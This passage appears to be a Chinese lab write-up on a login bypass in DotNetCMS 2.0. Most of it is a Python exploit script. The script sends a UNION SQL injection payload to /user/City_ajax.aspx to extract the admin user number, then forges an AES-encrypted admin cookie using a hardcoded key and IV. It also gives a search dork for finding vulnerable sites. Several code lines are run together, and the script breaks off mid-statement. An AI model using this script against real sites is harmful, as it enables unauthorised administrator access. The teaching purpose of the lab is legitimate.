【实验环境】仅供学习参考
信息收集
登陆目标网站并收集信息
通过查看页面源码,发现cms版本信息为:DotNetCMS 2.0,通过上网查询可以找到该cms存在的漏洞,并进行复现
登录绕过漏洞
网站后台地址:/manage/Index.aspx
1)将代码写入exp.py文件中运行,即可得到cookie
代码如下:
#coding:utf-8import argparseimport urllibimport tracebackimport base64from Crypto.Cipher import AESfrom binascii import b2a_hex, a2b_hex#################################search keyword: ####inurl:/manage/Login.aspx #################################
KEY = 'Guz(%&hj7x89H$yuBI0456FtmaT5&fvHUFCy76*h%(HilJ$lhj!y6&(*jkP87jH7'
IV = 'E4ghj*Ghg7!rNIfb&95GUY86GfghUb#er57HBh(u%g6HJ($jhWk7&!hg4ui%$hjk'def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="the url", required=True, nargs="+")
return parser.parse_args()def run(url):
try:
usernumber = get_usernumber(url)
if usernumber is not None:
encrypt_cookie = generate_cookie(usernumber)
#写入cookie中
write_cookie(url, encrypt_cookie)
except Exception:
traceback.print_exc()def get_usernumber(url):
fullurl = url + "/user/City_ajax.aspx?CityId=1' union all select UserNum,UserNum from dbo.fs_sys_User where UserName='admin"
content = urllib.urlopen(fullurl).read()
index = content.index("<option value=\"")
if index != -1:
usernumber = content[index+15:]
usernumber = usernumber[0: content.index("\"")+1]
print "Get usernumber success. Usernumber is :", usernumber
return usernumber
else:
print "Get usernumber fail"
return Nonedef pkcs7padding(data):
bs = AES.block_size
padding = bs - len(data) % bs
padding_text = chr(padding) * padding
return data + padding_textdef generate_cookie(usernumber):
orgstr = "%s,admin,0,1,False"%(usernumber,)
cryptor = AES.new(
